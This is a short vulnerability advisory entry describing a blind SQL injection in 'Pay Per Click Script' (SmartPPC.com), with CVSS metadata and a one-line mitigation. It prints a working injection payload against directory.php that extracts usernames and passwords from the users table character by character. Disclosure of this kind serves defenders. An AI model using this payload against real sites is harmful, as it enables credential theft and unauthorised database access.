vendor:
Pay Per Click Script
by:
Hamtaro aka CorVu5
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pay Per Click Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Blind SQL Injection Vulnerability in Pay Per Click Script
A Blind SQL Injection vulnerability was found in Pay Per Click Script powered by SmartPPC.com. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server with the payload 'site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108' which can be used to extract sensitive information from the database.
Mitigation:
Input validation and sanitization should be used to prevent SQL Injection attacks.